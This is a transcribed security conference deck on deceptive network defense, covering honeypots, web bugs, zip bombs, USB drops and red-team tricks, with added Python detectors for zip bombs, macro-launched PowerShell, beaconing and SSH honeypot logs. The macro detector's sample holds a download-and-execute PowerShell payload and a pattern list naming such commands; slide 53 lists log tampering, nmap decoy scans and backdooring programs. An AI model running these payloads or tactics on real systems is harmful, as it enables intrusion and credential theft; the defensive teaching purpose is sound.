
Deception Driven Defense - Infragard 2016

Using deceptive tactics to actively defend your network. This is a modified version of the talk that Thomas Hegel and I gave at DerbyCon 5.



  1. Deception Driven Defense
  2. # whoami: Greg Foss, Head of Security Operations. OSCP, GAWN, GPEN, GWAPT, GCIH, CEH, CYBER APT
  3. Diversion & Deception in Warfare: Draw Attention Away From True Attack Point. Mislead With False Appearance. Gain Advantage Over Enemy. “All war is based on deception” - Sun Tzu
  4. Diversion & Deception in Warfare: Operation Mincemeat - 1943, Operation Zeppelin - 1944, Battle of Megiddo - 1918, Operation Bodyguard - 1944, Operation Anadyr - 1962 ..and many more
  5. Operation Mincemeat - 1943. Step 1: Germans find a British corpse from a sunken enemy warship.
  6. Operation Mincemeat - 1943. Step 2: The corpse holds plans for an upcoming attack in Greece.
  7. Operation Mincemeat - 1943. Step 3: Germans move defenses from Sicily to Greece.
  8. Operation Mincemeat - 1943. Step 4: Allied Nations invade Sicily.
  10. Apply this to InfoSec?
  11. In Practice: Network, Data, Human, Defense
  12. First things first… Baseline security controls! Warning banners are critical and assist in the event prosecution is necessary / desired.
  13. Honeypots: Easy to configure, deploy, and maintain. Fly traps for anomalous activity. You will learn a ton about your adversaries. Information that will help in the future…
  14. Honeypot Use Cases: Subtle Traps, Catch Internal Attackers, Observe Attack Trends, Decoy From Real Data, Waste Attackers' Time
  15. Fake Web Applications: github.com/gfoss/phpmyadmin_honeypot
  16. $any-web-app: Custom + Believable, with a Hidden Motive
  17-19. Passive Honeypots: https://chloe.re/2015/06/20/a-month-with-badonions/
  20. Honey Tokens and Web Bugs
  21-23. Issues with Document Tracking
  24. Zip Bombs: AdobeFlash.zip, 42 bytes compressed, 4.5 petabytes uncompressed. www.unforgettable.dk
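A zip bomb handed to an attacker is only a nuisance; the same trick aimed at your own sandbox or AV scanner is a denial of service. The check a practitioner wants on the receiving side is below, as an added example that is not part of the deck: it reads the archive's central directory for the declared compression ratio and for nested archives (the 42.zip family hides its payload in zips within zips, so their headers look harmless), then extracts against a hard byte budget because the declared sizes are attacker-controlled. The thresholds, file names and the constructed test archives are assumptions for the example.

```python
import io
import os
import zipfile

# Policy thresholds (assumed for this example; tune to your environment).
MAX_RATIO = 100.0                 # declared uncompressed bytes / compressed bytes
MAX_TOTAL_UNCOMPRESSED = 1 << 30  # 1 GiB across the whole archive
READ_CHUNK = 64 * 1024


def inspect_zip(data: bytes) -> dict:
    """Summarise an archive from its central directory without extracting.

    The declared sizes come from headers the sender controls, so this is a
    cheap first filter, not a guarantee.
    """
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        infos = zf.infolist()
    compressed = sum(i.compress_size for i in infos)
    uncompressed = sum(i.file_size for i in infos)
    ratio = uncompressed / compressed if compressed else float("inf")
    # 42.zip-style bombs keep their payload in nested archives whose headers
    # look tiny, so nesting itself is treated as a signal.
    nested = [i.filename for i in infos if i.filename.lower().endswith(".zip")]
    return {"entries": len(infos), "compressed": compressed,
            "uncompressed": uncompressed, "ratio": ratio, "nested": nested}


def is_suspicious(report: dict) -> bool:
    return (report["ratio"] > MAX_RATIO
            or report["uncompressed"] > MAX_TOTAL_UNCOMPRESSED
            or bool(report["nested"]))


def extract_with_budget(data: bytes, budget: int) -> dict:
    """Extract into memory, counting real bytes as they inflate.

    Stops as soon as the running total exceeds `budget`, so a lying header
    cannot turn a 42-byte download into an out-of-memory or disk-full event.
    """
    out, total = {}, 0
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            buf = io.BytesIO()
            with zf.open(info) as fh:
                while True:
                    chunk = fh.read(READ_CHUNK)
                    if not chunk:
                        break
                    total += len(chunk)
                    if total > budget:
                        raise ValueError(
                            f"extraction budget of {budget} bytes exceeded at {info.filename}")
                    buf.write(chunk)
            out[info.filename] = buf.getvalue()
    return out


def build_sample(kind: str) -> bytes:
    """Constructed test archives for the example (not real malware)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        if kind == "bomb":
            # 4 MiB of zeros deflates to a few KiB: a ratio of roughly 1000:1.
            zf.writestr("AdobeFlash.exe", b"\x00" * (4 << 20))
        elif kind == "nested":
            zf.writestr("inner.zip", build_sample("benign"))
        else:
            zf.writestr("readme.txt", os.urandom(4096))  # random bytes do not compress
    return buf.getvalue()
```

`inspect_zip` is cheap enough to run on every upload or mail attachment; `extract_with_budget` is the control that actually holds when the headers lie, because it counts inflated bytes rather than trusting `file_size`.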
  25. Keys to Success: Real World Awareness Training. Use a Blended Approach to Exercises. Gather Metrics for Program Improvements. Note: Never Punish or Embarrass Users!
  26. Scope: Social Habits, Public Information, Username Correlation, Application Usage, “Private” Information, Examine Network Usage
  27. “Free” Coupons! QR destination is a training or phishing site. Print > Place on Cars in Lot. Metrics: Rate of Connections, Rate Reported to Security. Track via internal IP address.
  28. Targeted Spear Phishing. Metrics: Open Message Rate, Open Attachment Rate, Response / Exploitation Rate, Defense Success / Failures. See Martin Bos & Eric Milam, SkyDogCon 2012 - Advanced Phishing Tactics Beyond User Awareness
  29. Rogue Wi-Fi: Set up Wi-Fi access, provide a fake landing page, get credentials! Metrics: Connection Rate, Credential Submission Rate, Report to Security Rate. www.slideshare.net/heinzarelli/wifi-hotspot-attacks https://youtu.be/v36gYY2Pt70
  30. USB Drop Case Study
  31. Building a Believable Campaign: USB Human Interface Device (HID) attacks are too obvious. A dead giveaway that the target just compromised their system. http://hakshop.myshopify.com/products/usb-rubber-ducky-deluxe?variant=353378649
  32. Building a Believable Campaign: Use realistic files with somewhat realistic data. Staged approach to track file access and exploitation.
  33. Tracking File Access: Web bug file opened from within your company network? Correlate using network security tools to find out who it was.
  34. Who Opened the File?
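The honey token and web bug slides (20) and the "who opened the file?" correlation (33-34) come down to the same mechanics: seed each copy of a decoy document with a unique callback URL, then match fetches of that URL in the callback server's access log back to the copy and to the source address. The following is an added example of that correlation, not code from the talk. It assumes an Apache combined-format access log, an example callback host you would replace with a domain you control, RFC 1918 space as "internal", and constructed log lines; tokens are random and resolved through a server-side registry so that one leaked token reveals nothing about the others.

```python
import ipaddress
import re
import secrets

# Assumed: what counts as "inside the company network".
INTERNAL_NETS = [ipaddress.ip_network(n)
                 for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
CALLBACK_HOST = "cdn.example.invalid"  # assumed tracking host; use one you control

# Assumed Apache combined log format on the callback server.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"')
TOKEN_RE = re.compile(r"/t/(?P<token>[0-9a-f]{32})\.gif$")


def mint_token(registry: dict, document: str, recipient: str) -> str:
    """Create one unguessable token per (document, recipient) and record it.

    Embed the returned URL as a remote image in that recipient's copy.
    """
    token = secrets.token_hex(16)
    registry[token] = {"document": document, "recipient": recipient}
    return f"http://{CALLBACK_HOST}/t/{token}.gif"


def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def correlate(log_text: str, registry: dict) -> list:
    """Match web-bug fetches in the access log back to the seeded copy."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        t = TOKEN_RE.search(m["path"])
        if not t:
            continue
        # Unknown tokens (scanners, typos, someone probing the scheme) are
        # still reported, with no document attached.
        meta = registry.get(t["token"], {"document": None, "recipient": None})
        hits.append({**meta, "token": t["token"], "ip": m["ip"], "ts": m["ts"],
                     "internal": is_internal(m["ip"]), "ua": m["ua"]})
    return hits


def demo() -> list:
    """Constructed end-to-end run: two seeded copies, two real fetches, one probe."""
    registry = {}
    url_usb = mint_token(registry, "Q3_Salary_Review.docx", "usb-drop-lot-B")
    url_mail = mint_token(registry, "Q3_Salary_Review.docx", "phish-wave-1/jdoe")
    path_usb = url_usb.split(CALLBACK_HOST, 1)[1]
    path_mail = url_mail.split(CALLBACK_HOST, 1)[1]
    log = "\n".join([
        f'10.20.30.40 - - [14/Mar/2016:09:12:01 -0600] "GET {path_usb} HTTP/1.1" 200 43 "-" "Microsoft Office Word 2013"',
        f'203.0.113.7 - - [14/Mar/2016:11:40:55 -0600] "GET {path_mail} HTTP/1.1" 200 43 "-" "Mozilla/5.0"',
        '203.0.113.9 - - [14/Mar/2016:11:41:02 -0600] "GET /t/00000000000000000000000000000000.gif HTTP/1.1" 200 43 "-" "curl/7.47.0"',
        '10.20.30.41 - - [14/Mar/2016:09:13:00 -0600] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    ])
    return correlate(log, registry)
```

An internal hit gives you the source IP to hand to DHCP, NAC or proxy logs (the "network security tools" the slide refers to) to put a name on the workstation; an external hit tells you the decoy has left the building, which is the more interesting answer.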
  35. Compress the PowerShell Script
  36. Send email when macro is run. You may want to use a bogus email address, unlike I did here… I know, I know, bad OpSec…
  37. “Nobody’s going to run an executable from some random USB” - Greg
  38. At least they didn’t run it as an Admin. But… we now have our foothold…
  39. Macro Attack Detection
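The deck's USB drop ends with a macro launching PowerShell, so the detection slide deserves a concrete rule. The following is an added example (not from the talk) of the two signals that catch most of this class: an Office process spawning a scripting host or other living-off-the-land binary, and PowerShell started with encoded or download-and-execute arguments. It runs over constructed Sysmon-style process-creation records (field names follow Sysmon Event ID 1, the payload and host names are made up) and decodes `-EncodedCommand` so the analyst sees the script rather than a base64 blob.

```python
import base64
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
LOLBIN_CHILDREN = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe",
                   "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe"}
# Argument patterns commonly seen in macro droppers (not an exhaustive list).
SUSPICIOUS_ARGS = re.compile(
    r"-(?:e|enc|encodedcommand)\b|-w(?:indowstyle)?\s+hidden|downloadstring|"
    r"\biex\b|invoke-expression|frombase64string", re.I)
ENC_RE = re.compile(r"-(?:e|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].rsplit("/", 1)[-1].lower()


def decode_encoded_command(cmdline: str):
    """PowerShell -EncodedCommand is base64 of UTF-16LE; return the script or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def evaluate(event: dict):
    """Return an alert for one process-creation event, or None."""
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    reasons = []
    if parent in OFFICE_PARENTS and child in LOLBIN_CHILDREN:
        reasons.append(f"office application {parent} spawned {child}")
    if child == "powershell.exe" and SUSPICIOUS_ARGS.search(cmd):
        reasons.append("powershell launched with suspicious arguments")
    if not reasons:
        return None
    return {"host": event.get("Computer"), "user": event.get("User"), "parent": parent,
            "child": child, "reasons": reasons, "decoded": decode_encoded_command(cmd)}


def scan(events):
    return [alert for alert in (evaluate(e) for e in events) if alert]


def ps_encode(script: str) -> str:
    """Encode a script the way `powershell -EncodedCommand` expects (used for the sample)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events: one macro dropper, one normal Word launch, one
# legitimate configuration-management script run. Names and addresses are made up.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/s.ps1')"
SAMPLE_EVENTS = [
    {"Computer": "WS-042", "User": "CORP\\jdoe",
     "ParentImage": r"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell.exe -NoP -W Hidden -Enc {ps_encode(PAYLOAD)}"},
    {"Computer": "WS-042", "User": "CORP\\jdoe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE",
     "CommandLine": '"WINWORD.EXE" /n "Q3_Salary_Review.docm"'},
    {"Computer": "SRV-01", "User": "CORP\\svc_cm",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\cm\inventory.ps1"},
]
```

The parent/child rule fires even when the payload is not PowerShell, and the argument rule fires even when the parent is not Office (for instance a scheduled task left behind for persistence); the service-account run in the sample trips neither, which is the false-positive case you will meet first in any environment with configuration management.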
  40. Malware Beaconing Detection
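Beaconing detection is a timing problem: a callback implant contacts the same destination at a fixed interval, and humans do not. The added example below (not from the talk) groups connection records by source/destination pair and flags pairs whose inter-arrival times are too regular, measured as the coefficient of variation (standard deviation over mean) so that a beacon with a few seconds of jitter still stands out. The thresholds are assumptions; the flow data is constructed, with one host beaconing every five minutes plus jitter and another browsing irregularly.

```python
import random
import statistics
from collections import defaultdict

MIN_CONNECTIONS = 8      # enough samples to judge periodicity (assumed)
MAX_CV = 0.15            # stdev/mean of the gaps; lower means more regular (assumed)
MIN_PERIOD_SECONDS = 30  # ignore sub-30s chatter such as keepalives (assumed)


def find_beacons(flows):
    """Flag (src, dst) pairs whose inter-arrival times are suspiciously regular.

    `flows` is an iterable of (epoch_seconds, src, dst) tuples, in any order.
    """
    by_pair = defaultdict(list)
    for ts, src, dst in flows:
        by_pair[(src, dst)].append(ts)
    findings = []
    for (src, dst), times in by_pair.items():
        if len(times) < MIN_CONNECTIONS:
            continue
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        if mean < MIN_PERIOD_SECONDS:   # also guards against a zero mean
            continue
        cv = statistics.pstdev(gaps) / mean
        if cv <= MAX_CV:
            findings.append({"src": src, "dst": dst, "count": len(times),
                             "period_s": round(mean, 1), "cv": round(cv, 3)})
    return sorted(findings, key=lambda f: f["cv"])


def constructed_flows(seed: int = 7):
    """Synthetic connection log: one jittered beacon, one human browsing session."""
    rng = random.Random(seed)
    flows = []
    t = 1_458_000_000
    for _ in range(24):  # beacon every 300 s, +/- 10 s of jitter
        t += 300 + rng.randint(-10, 10)
        flows.append((t, "10.20.30.40", "198.51.100.23"))
    # Irregular gaps, as a person clicking around would produce.
    browsing_gaps = [12, 600, 45, 1180, 5, 300, 870, 60, 15, 420, 990, 30,
                     75, 700, 8, 1100, 250, 40, 500, 66, 900, 120, 33]
    t = 1_458_000_000
    for gap in browsing_gaps:
        t += gap
        flows.append((t, "10.20.30.41", "203.0.113.50"))
    rng.shuffle(flows)
    return flows
```

Run this over firewall, proxy or flow logs aggregated per day; the obvious evasions are long sleep intervals (raise the window, not the threshold) and heavy jitter (which pushes the coefficient of variation up, so pair this with destination rarity rather than relying on timing alone).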
  41. Red Teaming: Not Penetration Testing! No Scope Restrictions
  42. Offensive Honeypots: All of these tools have something in common…
     ● Configuration Management Systems
     ● Vulnerability Scanners
     ● System Health Checks
     They tend to log in to remote hosts!
  43. Simulate an SSH service. Stand this up during an internal penetration test. Catch credentials...
  44. Summarising the credentials kippo captured:
     #!/bin/bash
     # Summarise login attempts captured by the kippo SSH honeypot.
     LOG=/opt/kippo/log/kippo.log
     attempts=$(grep -c 'login attempt' "$LOG")
     echo ""
     echo "$attempts => login attempts"
     echo "--------------------"
     # After the 2nd comma the line reads "<src-ip>] login attempt [user/pass] ...";
     # print it as "[src-ip] [user/pass]".
     grep 'login attempt' "$LOG" | cut -d "," -f 3,4,5 | awk '{print "["$1" "$4}'
     echo "--------------------"
     echo ""
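The shell one-liner above works until a captured password contains a comma or a space, at which point `cut` and `awk` misalign the fields. The following added example (not from the talk) parses kippo's log with a single regular expression instead, groups attempts by source, and separates out the accounts you actually care about during an internal test: the ones your own scanners and configuration management log in with. The log line layout is taken from kippo's Twisted-style output and is an assumption here, as are the watched account names and the constructed log.

```python
import re
from collections import defaultdict

# Assumed kippo log line layout:
# 2016-03-14 09:12:01-0600 [SSHService ssh-userauth on HoneyPotTransport,3,10.20.30.40] login attempt [root/toor] failed
LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+) \[SSHService ssh-userauth on HoneyPotTransport,"
    r"(?P<session>\d+),(?P<ip>[0-9.]+)\] login attempt "
    r"\[(?P<user>[^/\]]+)/(?P<password>.*)\] (?P<result>succeeded|failed)$")

# Accounts your own tooling uses for remote logins (assumed names).
WATCHED_ACCOUNTS = {"svc_scanner", "svc_puppet", "ansible", "nagios", "backup"}


def parse(log_text: str) -> list:
    """Return one dict per login attempt; non-auth lines are ignored."""
    records = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            records.append(m.groupdict())
    return records


def summarize(records: list) -> dict:
    """Per-source counts and credential pairs, plus the watched-account hits."""
    by_ip = defaultdict(lambda: {"attempts": 0, "credentials": []})
    for r in records:
        entry = by_ip[r["ip"]]
        entry["attempts"] += 1
        entry["credentials"].append((r["user"], r["password"]))
    watched = [r for r in records if r["user"] in WATCHED_ACCOUNTS]
    return {"total": len(records), "by_ip": dict(by_ip), "watched": watched}


# Constructed sample: a brute-force source, then a scanner handing over a real
# service-account password that happens to contain a comma.
SAMPLE_LOG = """\
2016-03-14 09:12:01-0600 [SSHService ssh-userauth on HoneyPotTransport,3,10.20.30.40] login attempt [root/toor] failed
2016-03-14 09:12:04-0600 [SSHService ssh-userauth on HoneyPotTransport,3,10.20.30.40] login attempt [root/Password1] failed
2016-03-14 09:15:22-0600 [SSHService ssh-userauth on HoneyPotTransport,4,10.20.30.41] login attempt [svc_scanner/Sc4nM3,please] succeeded
2016-03-14 09:20:00-0600 [HoneyPotTransport,4,10.20.30.41] connection lost
"""
```

The `watched` list is the finding for the report: a credential that a scanner or deployment tool will present to any host answering on port 22 is exactly what the "offensive honeypot" slide is after, and it is also the argument for moving those tools to key-based or certificate-based authentication with host key verification turned on.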
  45. Social Engineering
  46. Social Engineering: WYSINWYC http://thejh.net/misc/website-terminal-copy-paste
  47. DEMO
  48. Post-Exploitation Tricks. Use deception to: elevate privileges, access protected resources, pivot and move laterally, etc.
  49. OS X - AppleScript: fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html
  50. DEMO
  51. Windows - PowerShell: github.com/gfoss/misc/blob/master/PowerShell/popuppwn.ps1
  52. DEMO
  53. Attack Security Tools
     ● Generate False and/or Malformed Logs
     ● Spoof Port Scanning Origins: $ sudo nmap -sS -P0 -D sucker target(s)
     ● Block UDP Port 514 or disable the logging service
     ● Capture Service Account Credentials
     ● Wear AV like a hat and backdoor legitimate programs on the shares…
  54. https://www.shellterproject.com/
  55. Target IT Staff… “It’s broken. :-( I don’t know what happened… Can you fix it?” github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz
  56. In Conclusion: Network, Data, Human, Defense
  57. Recommended Resources
     - Red Team: How to Succeed By Thinking Like the Enemy. Micah Zenko
     - Offensive Countermeasures: The Art of Active Defense. Paul Asadoorian and John Strand
     - Reverse Deception: Organized Cyber Threat Counter-Exploitation. Sean Bodmer
     - Second World War Deception: Lessons Learned for Today’s Joint Planner. Major Donald J. Bacon, USAF
  58. Thank You! Questions? Greg Foss, greg.foss [at] LogRhythm.com, @heinzarelli
